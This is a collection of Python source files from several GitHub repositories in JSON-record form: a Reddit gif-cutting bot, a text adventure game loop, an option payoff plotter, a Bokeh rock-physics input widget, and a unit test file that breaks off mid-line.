the media MIME-type and the media extension.\n \"\"\"\n oembed: Dict = self.message.submission.media.get('oembed', {})\n html_string: str\n try:\n html_string = oembed['html']\n except KeyError:\n html_string = oembed['url']\n if not isinstance(html_string, str):\n task_logger.error('Failed to obtain the HTML of the oEmbed.')\n soup = BeautifulSoup(html_string, features='html.parser')\n try:\n # todo proper error handling! this has only been validated with gfycat\n src_url = parse_qs(urlparse(soup.iframe.get('src'))[4]).get('src')[0]\n another_soup = BeautifulSoup(requests.get(src_url).content, features='html.parser')\n source_tag = another_soup.video.findAll(name='source')[1]\n ext: str = os.path.splitext(source_tag['src'])[-1][1:]\n return source_tag['src'], source_tag['type'], ext\n except Exception as ex:\n task_logger.error(f'Encountered oEmbed provider {oembed.get(\"provider_name\")}.\\n{ex}')\n raise OembedFailureException()\n\n\nclass TaskConfigFactory(TaskConfig):\n state: TaskConfigState = TaskConfigState.VALID\n\n @classmethod\n def from_message(cls, message: Message) -> TaskConfig:\n _config = {\n 'message': message,\n 'media_type': cls.__get_media_type(message),\n **cls.__parse_start_and_end(message),\n }\n return TaskConfig(**_config)\n\n @classmethod\n def __is_crosspost(cls, message: Message) -> bool:\n if hasattr(message.submission, 'crosspost_parent'):\n return message.submission.crosspost_parent is not None\n return False\n\n @classmethod\n def __is_video(cls, message: Message) -> bool:\n if cls.__is_crosspost(message=message):\n return message.submission.crosspost_parent_list[-1].get('is_video', False)\n return message.submission.is_video\n\n @classmethod\n def __is_gif(cls, message: Message) -> bool:\n if cls.__is_crosspost(message=message):\n return False # todo\n if message.submission.url:\n return os.path.splitext(message.submission.url)[-1][1:] == 'gif'\n return False\n\n @classmethod\n def __is_oembed(cls, message: Message):\n # full oembed spec: https://oembed.com/#section2\n # media is a dynamic attribute on submission\n if not hasattr(message.submission, 'media'):\n return False\n return bool(message.submission.media.get('oembed', False))\n\n @classmethod\n def __parse_start_and_end(cls, message: Message) -> Dict[str, float]:\n params = {}\n pattern = re.compile(r'(s|start)=([\\d]+) (e|end)=([\\d]+)', re.IGNORECASE)\n matches = pattern.search(message.body)\n if matches is None:\n root_logger.warning('Skipping message because no match was found.')\n cls.state = TaskConfigState.INVALID\n return {}\n root_logger.debug(f'Found pattern matches: {matches.groups()}')\n params['start'] = int(matches.group(2))\n params['end'] = int(matches.group(4))\n return params\n\n @classmethod\n def __get_media_type(cls, message: Message) -> Union[MediaType, None]:\n if cls.__is_video(message=message):\n # get video from original post (apparently we can only get it from there so we do the the backtrace)\n if cls.__is_crosspost(message=message):\n reddit_video = message.submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = message.submission.secure_media.get('reddit_video', {})\n ext: str = os.path.splitext(reddit_video.get('scrubber_media_url', [' ']))[-1][1:]\n if ext == '':\n cls.state = TaskConfigState.INVALID\n return None\n return MediaType[ext.upper()]\n elif cls.__is_gif(message=message):\n return MediaType.GIF\n elif cls.__is_oembed(message=message):\n oembed: Dict = message.submission.media.get('oembed', {})\n html_string: str\n try:\n html_string = oembed['html']\n except KeyError:\n html_string = oembed['url']\n if not isinstance(html_string, str):\n task_logger.error('Failed to obtain the HTML of the oEmbed.')\n soup = BeautifulSoup(html_string, features='html.parser')\n try:\n # todo proper error handling! this has only been validated with\n src_url = parse_qs(urlparse(soup.iframe.get('src'))[4]).get('src')[0]\n another_soup = BeautifulSoup(requests.get(src_url).content, features='html.parser')\n source_tag = another_soup.video.findAll(name='source')[1]\n ext: str = os.path.splitext(source_tag['src'])[-1][1:]\n return MediaType[ext.upper()]\n except Exception as ex:\n task_logger.error(f'Encountered oEmbed provider {oembed.get(\"provider_name\")}.\\n{ex}')\n else:\n cls.state = TaskConfigState.INVALID\n return None\n\n\nclass Task(object):\n def __init__(self, config: TaskConfig):\n self.__config: TaskConfig = config\n self._task_state = TaskState.VALID\n self._select_handler()\n\n def __call__(self, *args, **kwargs):\n return self.handle()\n\n @property\n def state(self):\n return self._task_state\n\n def is_state(self, state: Union[TaskState, List[TaskState]]) -> bool:\n if state is List:\n return self._task_state in state\n return self._task_state == state\n\n def _select_handler(self):\n mt: MediaType = self.__config.media_type\n if mt == MediaType.GIF:\n self._task_handler = handler_pkg.gif.GifCutHandler()\n elif mt in [MediaType.MP4, MediaType.MOV, MediaType.WEBM]:\n self._task_handler = handler_pkg.video.VideoCutHandler()\n else:\n self._task_state = TaskState.DROP\n # self._task_handler = TestCutHandler()\n root_logger.warning(f'No handler for media type: {mt}')\n\n def handle(self) -> result_pkg.Result:\n _stream: Optional[BytesIO] = self._fetch_stream()\n if self._task_state == TaskState.INVALID:\n raise TaskFailureException('Failed to fetch stream from host!')\n _result: result_pkg.Result = self._task_handler.cut(stream=_stream, config=self.__config)\n self._task_state = TaskState.DONE\n return _result\n\n def _fetch_stream(self) -> Optional[BytesIO]:\n _stream: BytesIO\n media_url: str = self.__config.media_url\n with requests.get(media_url, stream=True) as r:\n if r.status_code == 200:\n self._task_state = TaskState.VALID\n _stream = BytesIO(r.raw.read())\n else:\n self._task_state = TaskState.INVALID\n return None\n return _stream\n\n @property\n def config(self):\n return self.__config\n","repo_name":"tahesse/gifCutterBot","sub_path":"src/execution/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":15074,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"74058221672","text":"\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Forest's and Nåså's #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Gameloop and setting up the game. #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # \n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n#\n# File that starts the game, sets up the game and contains the game loop.\n# Contains the gamestate class which contains the objects from the other classes.\n#\n\nimport time, sys, random\nimport gm_combat, gm_map, gm_items, gm_scenarios, gm_locations, gm_charstats\nimport gm_badguys\n\nSLEEPTIMER = 1 # Global variable used for changing the speed of the cascading print function,\n# and time.sleep(sleeptimer)\n\n\nclass Gamestate():\n def __init__(self):\n # Groups up all game information in one class, so that it can be passed around in the functions.\n self.scenarioIndex = 0 # Index to iterate over scenarios\n self.scenario = gm_scenarios.SCENARIOS[self.scenarioIndex] # Inserts the dictionary of the scenario\n self.player = gm_charstats.Player()\n self.map = gm_map.WorldMap(self.scenario, self.scenarioIndex)\n self.payexMode = False\n self.gameIsDone = False\n self.enemy = []\n self.enemyIndex = len(self.enemy) - 1\n self.sleepTimer = 1\n\n\n def iterateScenario(self):\n # updates gamestate when you change to the next scenario. \n if self.scenarioIndex == len(gm_scenarios.SCENARIOS) - 1:\n # If you are at the last scenario, start from the first one again.\n self.scenarioIndex = 0\n self.scenario = gm_scenarios.SCENARIOS[self.scenarioIndex] # Inserts the dictionary of the scenario\n self.map = gm_map.WorldMap(self.scenario, self.scenarioIndex) # set up the next map based on the dictionary in self.scenario\n self.map.victory = False # reset victory flag\n gm_map.printThis(gm_scenarios.ENDING_MSG)\n \n else:\n self.scenarioIndex += 1\n self.scenario = gm_scenarios.SCENARIOS[self.scenarioIndex] # Inserts the dictionary of the scenario\n self.map = gm_map.WorldMap(self.scenario, self.scenarioIndex) # set up the next map based on the dictionary in self.scenario\n self.map.victory = False # reset victory flag\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Setting up player #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef enterPlayerName(gameState):\n #starts the game, prompts for user to enter player name and calls playerStartingStats()\n playerName = \"\"\n # Set player name, with input validation.\n while len(playerName) == 0:\n playerName = (input('Please enter player name: ').lower())\n for letter in playerName:\n if letter in 'abcdefghijklmnopqrstuvwxyzæøå ':\n gameState.player.name = playerName\n else:\n print(\"Name must be written with letters, avoid numbers and special characters\")\n playerName = \"\"\n \n\ndef setPlayerAttributes(gameState):\n # Set the starting attributes of the newPlayer\n getStartingStats(gameState.player)\n # update player stats based on the changes done prior.\n gameState.player.playerArmChange()\n gameState.player.playerHpChange()\n gameState.player.setupModifiers()\n # gameState is returned to the main() function.\n return gameState\n\n\ndef getStartingStats(gameState):\n # Setting the starting stats of the player. Default max attribute points(variable: totalPointsAllocated) are changed by difficulty settings.\n minPointsAllowedInOneStat = 1 # You can not have less than 1 point in each stat.\n maxPointsAllowedInOneStat = gameState.totalPointsAllocated - 2 # When setting starting stats, you can not have all your points in one stat, atleast 2 points are reserved to the last 2 stats.\n modifiedmaxPointsAllowedInOneStat = gameState.totalPointsAllocated - 2 \n totalPointsLeft = gameState.totalPointsAllocated \n \n # Setting variables for the calculation of allotted player stat points\n str = 0 # Strenght\n agi = 0 # Agility\n fort = 0 # Fortitude\n print(\"\\nNow you have to enter your characters stats, they are Strenght, Agility and Fortitude.\\nYou got %s points to distribute between the stats.\" % (gameState.totalPointsAllocated))\n print(\"You can allocate 1-%s points to the first category.\\n\" % (maxPointsAllowedInOneStat))\n\n # Calls getStartingAttribute which returns the value that the user enters for the strength stat\n str = getStartingAttribute( \"Enter player strength: \", minPointsAllowedInOneStat, maxPointsAllowedInOneStat)\n totalPointsLeft = totalPointsLeft - str\n # Calculates the points that are lefts for the next stats and displays it to the user, the -1 is there to ensure that there is 1 point left for the last stat.\n modifiedmaxPointsAllowedInOneStat = gameState.totalPointsAllocated - str - 1\n \n print(\"\\nYou have\",modifiedmaxPointsAllowedInOneStat,\"point(s) left to use for the next stat.\")\n # Checks that if there are less points available than max point allowed, then sets total points left -1(for last stat) as max points you can use for the next stat\n if totalPointsLeft < modifiedmaxPointsAllowedInOneStat:\n modifiedmaxPointsAllowedInOneStat = totalPointsLeft - 1\n print()\n # Calls getStartingAttribute which returns the value that the user enters for the agility stat\n agi = getStartingAttribute( \"Enter player agility: \", minPointsAllowedInOneStat, modifiedmaxPointsAllowedInOneStat )\n # calculates the total points that are left for use after setting agility stat\n totalPointsLeft = totalPointsLeft - agi\n # assign the points that are left to fortitude.\n fort = totalPointsLeft\n # Call player stat change with the values that have been input by the user, to update player. \n gameState.playerStatChange(str, agi, fort)\n time.sleep(SLEEPTIMER * 1)\n print()\n\n\ndef getStartingAttribute(prompt, min_value, max_value):\n # When starting the game, player are prompted to enter value for the different stats.\n # this checks if the value is valid according to input from getStartingStats()\n while 1:\n value = input(prompt)\n if value.isnumeric():\n value = int(value)\n if value >= min_value and value <= max_value:\n return value\n else:\n print(\"You entered a value that is too high, or too low.\")\n else:\n print(\"You did not enter a number, please enter a number.\")\n\n\ndef enterDifficulty(gameState):\n # Set game difficulty, with input validation.\n difficulty = ''\n while True:\n print('Please enter difficulty (easy, medium, hard): ', end='')\n difficulty = input().lower()\n if difficulty == 'easy' or difficulty == 'e':\n gameState.player.totalPointsAllocated = 10\n break\n elif difficulty == 'medium' or difficulty == 'm':\n break # totalPointsAllocated default = 6 so no change is needed.\n elif difficulty == 'hard' or difficulty == 'h':\n gameState.player.totalPointsAllocated = 4\n break\n elif difficulty == 'god': # god mode, for show and tell\n gameState.player.totalPointsAllocated = 30\n break\n elif difficulty == 'debug': # Debug-ish mode, with more stats, and timers are reduced. To speed through states.\n gameState.sleepTimer = 0.1\n gameState.player.totalPointsAllocated = 30\n break\n\n\ndef setPayexMode(gameState):\n # Set payex mode, it's just for naming enemies differently. For funs.\n mode = input('Do you want Payex names?: ').lower()\n if mode == 'yes' or mode == 'y':\n gameState.payexMode = True\n\n\n# ### End of player setup ###\n\n\ndef nextScenario(gameState):\n # When a scenario is finished, ititiate the next scenario.\n gameState.iterateScenario() # Set up the next scenario in gamestate object.\n gameState.player.attributes.pl_current_hp = gameState.player.attributes.pl_maxhp # Reset player hp to max.\n # Print scenario stuff\n gm_map.printThis(gameState.scenario[\"intro\"])\n input(\"\\nHit 'Enter' to continue...\")\n gameLoop(gameState) # go back to the game loop after the setup is complete.\n\n\ndef titleScreen():\n # prints the title of the game.\n print(gm_map.TITLE1) \n print()\n print(gm_map.TITLE2)\n time.sleep(SLEEPTIMER * 2)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Main function #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef main():\n # Starts the game, calls the game loop\n titleScreen() # print the title of the game. \n \n # Setting the game up\n gameState = Gamestate() # Set up gamestate object\n setPayexMode(gameState) # Can be commented out to remove payex functionality.\n enterDifficulty(gameState) # Set up difficulty\n enterPlayerName(gameState) # Set up new player, This will also print prompts and player information to the player.\n setPlayerAttributes(gameState) # Set player attributes based on the stats set in the previous function.\n \n # Game is set up, print map info and introduction text. \n gameState.map.drawMap(gameState) # Draw the map on the screen.\n gm_map.printThis(gameState.scenario[\"intro\"])\n time.sleep(SLEEPTIMER * 1)\n gameState.map.whatToDo(gameState) # Start the first \"what would you like to do\" dialogue before entering the game loop.\n \n # Move on to the game loop\n gameLoop(gameState)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Game loop #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef gameLoop(gameState):\n # Main game loop\n while True:\n if gameState.gameIsDone == True:\n # If all scenarios are complete, print message stating that you are done, but can continue playing for fun.\n print(gm_scenarios.ENDING_MSG)\n gameState.gameIsDone = False\n\n if gameState.map.victory == True and gameState.player.inCombat == False:\n # Check if the victory conditions are met, start prep for next scenario and print game ending messages.\n if gameState.map.specialItemFound == False:\n gm_items.specialItemFound(gameState) # if special item is not found yet, player recieve it at the end of the scenario\n gm_map.printThis(gameState.scenario[\"ending\"])\n time.sleep(SLEEPTIMER * 4)\n print(gm_scenarios.VICTORY) # print victory ascii art\n time.sleep(SLEEPTIMER * 4)\n nextScenario(gameState) # start a new scenario.\n\n if gameState.player.inCombat == True:\n # Before starting map movement check if player is in combat, if so, call the combat loop.\n gm_combat.combatLoop(gameState)\n \n # Movement loop\n gameState.map.drawMap(gameState) # draw the map\n gameState.map.whatToDo(gameState) # ask the player what to do\n \n if gameState.player.inCombat == True:\n # check If the player is in combat after movement.\n gm_combat.combatLoop(gameState) \n \n if gameState.player.dead == True: # if the player is dead, print game over, and ask if you want to play again.\n gm_scenarios.gameOver()\n \n print(\"# Game loop has ended.\") # Print that the application is out of the loop, meant for debug purposes.\n\nif (__name__ == \"__main__\"):\n main()\n","repo_name":"Vansalot/ForanN","sub_path":"FnN/gm_gameloop.py","file_name":"gm_gameloop.py","file_ext":"py","file_size_in_byte":11822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18804290892","text":"import numpy as np\nimport matplotlib.pyplot as plt\nS= np.linspace(1,1,140)\ndef calculate(T,S,K,sigma,r):\n T=float(T)\n S=float(S)\n K=float(K)\n sigma=float(sigma)\n r=float(r)\n C=max(S-K,0)\n P=max(K-S,0)\n return C,P\nT=1\nS=0\nsigma=0.3\nr=0.12\ndef plot_graphs():\n X=[]\n Y0_1=[]\n Y0_2=[]\n Y0_3=[]\n Y1_1=[]\n Y1_2=[]\n Y1_3=[]\n Y1_4=[]\n\n Y=[]\n for i in range(140):\n C1,P1=calculate(T,i+1,20,sigma,r)\n C2,P2=calculate(T,i+1,40,sigma,r)\n C3,P3=calculate(T,i+1,60,sigma,r)\n C4,P4=calculate(T,i+1,80,sigma,r)\n Y0_1.append(C2/20)\n Y0_2.append(-1*C3/20)\n Y0_3.append((C2-C3)/20)\n Y1_1.append(C1/20)\n Y1_2.append(-C2/20)\n Y1_3.append(-C3/20)\n Y1_4.append(C4/20)\n Y.append((C1+C4-C2-C3)/20)\n X.append(i+1)\n plt.figure()\n plt.title('')\n plt.plot(X,Y0_1,linestyle='dashed',color='palevioletred')\n plt.plot(X,Y0_2,linestyle='dashed',color='lightseagreen')\n plt.plot(X,Y0_3,linestyle='solid',color='limegreen')\n plt.xlabel('Stock Price at expiry')\n plt.ylabel('Payoff')\n plt.grid('on')\n plt.legend(['Long Call at strike $40','Short Call at strike $60','Net Payoff'])\n plt.show()\n\n plt.figure()\n plt.title('')\n plt.plot(X,Y1_1,linestyle='dashed',color='mediumslateblue')\n plt.plot(X,Y1_2,linestyle='dashed',color='palevioletred')\n plt.plot(X,Y1_3,linestyle='dashed',color='lightseagreen')\n plt.plot(X,Y1_4,linestyle='dashed',color='plum')\n plt.plot(X,Y,linestyle='solid',color='limegreen')\n plt.xlabel('Stock Price at expiry')\n plt.ylabel('Payoff')\n plt.grid('on')\n plt.legend(['Long Call at strike $20','Short Call at strike $40','Short Call at strike $60','Long Call at strike $80','Net Payoff'],loc=4)\n plt.show()\nif __name__=='__main__':\n plot_graphs()\n\n\n","repo_name":"mahekvora21/JPMC_Case_Study","sub_path":"MAHEK_VORA_CASE_STUDY_A_Q5_AB_MAIN.py","file_name":"MAHEK_VORA_CASE_STUDY_A_Q5_AB_MAIN.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28520549364","text":"###############################################################################\n\n# Author: Antony Hallam\n# Company: HWU\n# Date: 22-9-2018\n\n# File Name: dims.py\n\n# Synopsis:\n# Class to handle interactive selection of data models in geopy.\n# DIMS - Data Input Manager & Selector\n\n###############################################################################\n\nfrom collections import OrderedDict\n\nclass ExtOrderedDict(OrderedDict):\n\n def __init__(self):\n super(ExtOrderedDict,self).__init__()\n\n def keyslist(self):\n return list(self.keys())\n\nimport numpy as np\nimport pandas as pd\n\nfrom bokeh.layouts import row, column\nfrom bokeh.models import TableColumn, DataTable, ColumnDataSource, Panel, Tabs\nfrom bokeh.models.widgets import Slider, Select, Div\n\nfrom data.structLith import structRock, structMineral, structFluid, structDryFrame\n#from func.funcRP import calcDryFrame_dPres, calcVelp, calcVels, gassmann_dry2fluid, mixfluid\n\nclass widgetDIMS(object):\n\n column_names_rocks = ['kclay', 'muclay', 'rhoclay',\n 'knonclay', 'munonclay', 'rhononclay',\n 'vclay', 'phi', 'dryEk', 'dryPk', 'dryEg', 'dryPg']\n column_names_fluids = ['Name', 'ko', 'rhoo', 'kw', 'rhow', 'kg', 'rhog', 'so', 'sw', 'sg' ]\n column_names_pres = ['Name', 'OB_Grad', 'init_Pres', 'curr_Pres']\n column_names_output = ['rock', 'fluid', 'Vp', 'Vs', 'rho', 'other']\n\n def __init__(self,init_depth,file_rocks,file_fluids,file_prespfs,fdi=None):\n '''\n :param init_depth: Initial depth to model (TVDSS).\n :param file_rocks: File with input mineral parameters.\n :param file_fluids: File with input fluid parameters.\n :param file_prespfs: File with input pressure profiles.\n :keyword dependents: A list of geoPy widgets which need to be updated when widgetDIMS is changed.\n '''\n # Initial Data\n self.df_rocks = pd.read_csv(file_rocks, skipinitialspace=True)\n self.df_fluids = pd.read_csv(file_fluids, skipinitialspace=True)\n self.df_pres = pd.read_csv(file_prespfs, skipinitialspace=True)\n self.init_depth = init_depth # mTVDSS\n self.pagewidth = 1000 # pixels\n self.fdi = fdi\n\n # Setup Sources\n self.CDS_rocks = ColumnDataSource(self.df_rocks)\n self.CDS_fluids = ColumnDataSource(self.df_fluids)\n self.CDS_pres = ColumnDataSource(self.df_pres)\n self.CDS_out = ColumnDataSource(data=dict())\n # Extract Names\n self.odict_rocks = self.__odictIndex(self.df_rocks.Name.tolist())\n self.odict_fluids = self.__odictIndex(self.df_fluids.Name.tolist())\n self.odict_pres = self.__odictIndex(self.df_pres.Name.tolist())\n # Setup widgets\n self.createTableWidgets()\n self.createControls()\n self.createLayout()\n\n self.on_selection_change('value',1,1)\n\n def __odictIndex(self,keys):\n out = ExtOrderedDict()\n for ind,key in enumerate(keys):\n out[key] = ind\n return out\n\n def createTableWidgets(self):\n self.col_rocks = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_rocks]\n self.col_fluids = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_fluids]\n self.col_pres = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_pres]\n self.col_out = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_output]\n #Setup table widgets\n tablekwargs = {'width': self.pagewidth, 'editable': True}\n self.TW_rocks = DataTable(source=self.CDS_rocks, columns=self.col_rocks, **tablekwargs)\n self.TW_fluids = DataTable(source=self.CDS_fluids, columns=self.col_fluids, **tablekwargs)\n self.TW_pres = DataTable(source=self.CDS_pres, columns=self.col_pres, **tablekwargs)\n self.TW_out = DataTable(source=self.CDS_out, columns=self.col_out, **tablekwargs)\n\n def createControls(self):\n # Setup Select Panes and Input Widgets\n\n #Obr - Overburden rock #ResR - Reservoir rock\n #Obf - Oberburden fluid #Resf - Reservoir fluid\n self.selectObr = Select(value=self.odict_rocks.keyslist()[0], options=self.odict_rocks.keyslist(),\n title=\"Rock Model\")\n self.selectResR = Select(value=self.odict_rocks.keyslist()[0], options=self.odict_rocks.keyslist(),\n title=\"Rock Model\")\n self.selectObf = Select(value=self.odict_fluids.keyslist()[0], options=self.odict_fluids.keyslist(),\n title=\"Fluid Model\")\n self.selectResf = Select(value=self.odict_fluids.keyslist()[0], options=self.odict_fluids.keyslist(),\n title=\"Fluid Model\")\n self.selectPres = Select(value=self.odict_pres.keyslist()[0], options=self.odict_pres.keyslist(),\n title=\"Pressure Scenario\")\n\n self.slideDepth = Slider(start=0, end=10000, value=self.init_depth, step=10, title='Depth (TVDSS)',\n callback_policy='mouseup')\n\n self.selectObr.on_change('value', self.on_selection_change)\n self.selectResR.on_change('value', self.on_selection_change)\n self.selectObf.on_change('value', self.on_selection_change)\n self.selectResf.on_change('value', self.on_selection_change)\n self.selectPres.on_change('value', self.on_selection_change)\n self.slideDepth.on_change('value', self.on_selection_change)\n\n def createLayout(self):\n # Layout of Page\n self.inputTab1 = Panel(child=self.TW_rocks, title='Rock Models')\n self.inputTab2 = Panel(child=self.TW_fluids, title='Fluid Mixes')\n self.inputTab3 = Panel(child=self.TW_pres, title='Pressure Scenarios')\n self.inputTab4 = Panel(child=self.TW_out, title='Model Calculations')\n\n self.inputTabs = Tabs(tabs=[self.inputTab1, self.inputTab2,\n self.inputTab3, self.inputTab4],\n width=self.pagewidth, height=200)\n\n textrowob = Div(text=\"

    Overburden:

    \")\n selectrowob = row(self.selectObr, self.selectObf, width=500, height=50, sizing_mode=\"scale_both\")\n textrowres = Div(text=\"

    Reservoir:

    \")\n selectrowres = row(self.selectResR, self.selectResf, width=500, height=50, sizing_mode=\"scale_both\")\n selectrowpres = row(self.selectPres, self.slideDepth, width=500, height=50, sizing_mode=\"scale_both\")\n self.layout = column(self.inputTabs,\n textrowob,\n selectrowob,\n textrowres,\n selectrowres,\n selectrowpres, width=self.pagewidth)\n\n def on_selection_change(self,attribute,old,new):\n # update active selections\n self.activeObr = self.df_rocks.loc[self.odict_rocks[self.selectObr.value]] #Overburden Rock and Fluid\n self.activeObf = self.df_fluids.loc[self.odict_fluids[self.selectObf.value]]\n self.activeResR = self.df_rocks.loc[self.odict_rocks[self.selectResR.value]] #Reservoir Rock and Fluid\n self.activeResF = self.df_fluids.loc[self.odict_fluids[self.selectResf.value]]\n self.activePresPf = self.df_pres.loc[self.odict_pres[self.selectPres.value]] #Pressure Profile\n self.cur_depth = self.slideDepth.value\n self.updateRocks()\n self.updateFluids()\n self.updateRockModel()\n if self.fdi != None:\n self.fdi.updateModel(self.activeResR_dry, self.activeResF_mix, self.fdi.min_pres, self.fdi.max_pres,\n init_imp=self.activeResRM.pimp)\n\n def updateRocks(self):\n #update rock models based upon selections\n parnonclay = ['knonclay', 'munonclay', 'rhononclay'];\n parclay = ['kclay', 'muclay', 'rhoclay']\n obnonshale = structMineral('nonshale', *[self.activeObr[par] for par in parnonclay])\n obshale = structMineral('shale', *[self.activeObr[par] for par in parclay])\n nonshale = structMineral('nonshale', *[self.activeResR[par] for par in parnonclay])\n shale = structMineral('shale', *[self.activeResR[par] for par in parclay])\n # output rock names to table\n self.CDS_out.data['rock'] = [self.activeObr['Name'], self.activeResR['Name']]\n\n #update dryrock properties\n self.activeObr_dry = structDryFrame(self.activeObr['Name'], obnonshale, obshale, self.activeObr['vclay'],\n self.activeObr['phi'])\n self.activeResR_dry = structDryFrame(self.activeResR['Name'], nonshale, shale, self.activeResR['vclay'],\n self.activeResR['phi'])\n self.activeObr_dry.calcRockMatrix(); self.activeResR_dry.calcRockMatrix()\n parp = ['init_Pres', 'curr_Pres']; pardry = ['dryEk', 'dryPk', 'dryEg', 'dryEk']\n self.activeObr_dry.calcDryFrame(self.activePresPf['OB_Grad'], self.cur_depth, *[self.activePresPf[par] for par in parp],\n *[self.activeObr[par] for par in pardry])\n self.activeResR_dry.calcDryFrame(self.activePresPf['OB_Grad'], self.cur_depth, *[self.activePresPf[par] for par in parp],\n *[self.activeResR[par] for par in pardry])\n\n def updateFluids(self):\n # oil, water, gas, setup and mixing\n parw = ['kw', 'rhow', 'sw']; paro = ['ko', 'rhoo', 'so']; parg = ['kg', 'rhog', 'sg']\n self.activeObf_mix = structFluid(self.activeObf['Name'], water=[self.activeObf[ind] for ind in parw],\n oil=[self.activeObf[ind] for ind in paro],\n gas=[self.activeObf[ind] for ind in parg])\n self.activeResF_mix = structFluid(self.activeResF['Name'], water=[self.activeResF[ind] for ind in parw],\n oil=[self.activeResF[ind] for ind in paro],\n gas=[self.activeResF[ind] for ind in parg])\n # output fluid names to table\n self.CDS_out.data['fluid'] = [self.activeObf['Name'], self.activeResF['Name']]\n\n\n def updateRockModel(self):\n\n # calculate rock models and properties\n self.activeObrM = structRock(self.activeObr_dry, self.activeObf_mix)\n self.activeObrM.calcGassmann(); self.activeObrM.calcDensity(); self.activeObrM.calcElastic()\n self.activeResRM = structRock(self.activeResR_dry, self.activeResF_mix)\n self.activeResRM.calcGassmann(); self.activeResRM.calcDensity(); self.activeResRM.calcElastic()\n\n # output rockproperties to table\n self.CDS_out.data['Vp'] = [self.activeObrM.velp, self.activeResRM.velp]\n self.CDS_out.data['Vs'] = [self.activeObrM.vels, self.activeResRM.vels]\n self.CDS_out.data['rho'] = [self.activeObrM.den, self.activeResRM.den]\n self.CDS_out.data['other'] = [self.activeObrM.pimp, self.activeResRM.pimp]\n\nif __name__ == \"__main__\":\n from os.path import dirname, join, split\n from os import getcwd\n from bokeh.io import show\n\n #setup figure variables\n idepth = 3180 # mTVDSS\n\n print('before')\n if split(getcwd())[-1] == 'layouts':\n inputs = join('..','inputs')\n elif split(getcwd())[-1] == 'geoPy':\n inputs = 'inputs'\n else:\n raise SystemError\n print(\"Can't run from this file from: \"+getcwd())\n\n print('after')\n fr = join(dirname(__file__),inputs,'geoPy_rocks.csv')\n ff = join(dirname(__file__),inputs,'geoPy_fluids.csv')\n fp = join(dirname(__file__),inputs,'geoPy_pres.csv')\n\n dims = widgetDIMS(idepth,fr,ff,fp)\n show(dims.TW_rocks)\n\n\n\n\n\n\n","repo_name":"trhallam/geoPy","sub_path":"layouts/dims.py","file_name":"dims.py","file_ext":"py","file_size_in_byte":11803,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"30771065149","text":"import unittest\nfrom unittest.mock import MagicMock, patch, call\n\nfrom controlling.AsyncProcessor import AsyncProcessor\n\n_EXCEPTION_TEXT = \"something horrible went wrong\"\n\n\nclass AsyncProcessorTest(unittest.TestCase):\n def test_enqueue_submits_action_to_ThreadPool(self):\n thread_pool_mock = MagicMock()\n asyncProcessor = AsyncProcessor(thread_pool_mock)\n\n asyncProcessor.enqueue(self._some_action)\n\n assert thread_pool_mock.submit.called\n\n @patch(\"builtins.print\", autospec=True, side_effect=print)\n def test_enqueue_prints_exception_if_action_raises_one(self, print_mock):\n thread_pool_mock = MagicMock()\n asyncProcessor = AsyncProcessor(thread_pool_mock)\n thread_pool_mock.submit = lambda action, parameter: action(parameter)\n\n asyncProcessor.enqueue(self._raise_exception)\n\n calls = [call(\"*** EXCEPTION IN THREAD ***\"), call(_EXCEPTION_TEXT)]\n print_mock.assert_has_calls(calls)\n\n def _raise_exception(self):\n raise Exception(_EXCEPTION_TEXT)\n\n def _some_action(self):\n print(\"hello world\")\n","repo_name":"wtjerry/hslu_pren","sub_path":"tests/AsyncProcessorTest.py","file_name":"AsyncProcessorTest.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34147875943","text":"import unittest\nfrom hw09 import UniversityLoader\n\n\n\"\"\"\nUnit test class.\n\"\"\"\n\n\nclass hw09test (unittest.TestCase):\n\n \"\"\"\n Tests if the student pretty table is correct.\n \"\"\"\n\n def test_student_table(self):\n\n # Expected value\n expected = [['10103', 'Baldwin, C', 'SFEN', [{'CS 501': 'B'}, {'SSW 564': 'A-'}, {'SSW 567': 'A'}, {'SSW 687': 'B'}]],\n ['10115', 'Wyatt, X', 'SFEN', [{'CS 545': 'A'}, {'SSW 564': 'B+'}, {'SSW 567': 'A'}, {'SSW 687': 'A'}]], ['10172', 'Forbes, I', 'SFEN', [{'SSW 555': 'A'}, {'SSW 567': 'A-'}]], ['10175', 'Erickson, D', 'SFEN', [{'SSW 564': 'A'}, {'SSW 567': 'A'}, {'SSW 687': 'B-'}]], [\n '10183', 'Chapman, O', 'SFEN', [{'SSW 689': 'A'}]], ['11399', 'Cordova, I', 'SYEN', [{'SSW 540': 'B'}]], ['11461', 'Wright, U', 'SYEN', [{'SYS 611': 'A'}, {'SYS 750': 'A-'}, {'SYS 800': 'A'}]], ['11658', 'Kelly, P', 'SYEN', [{'SSW 540': 'F'}]], ['11714', 'Morton, A', 'SYEN', [{'SYS 611': 'A'}, {'SYS 645': 'C'}]], ['11788', 'Fuller, E', 'SYEN', [{'SSW 540': 'A'}]]]\n university = 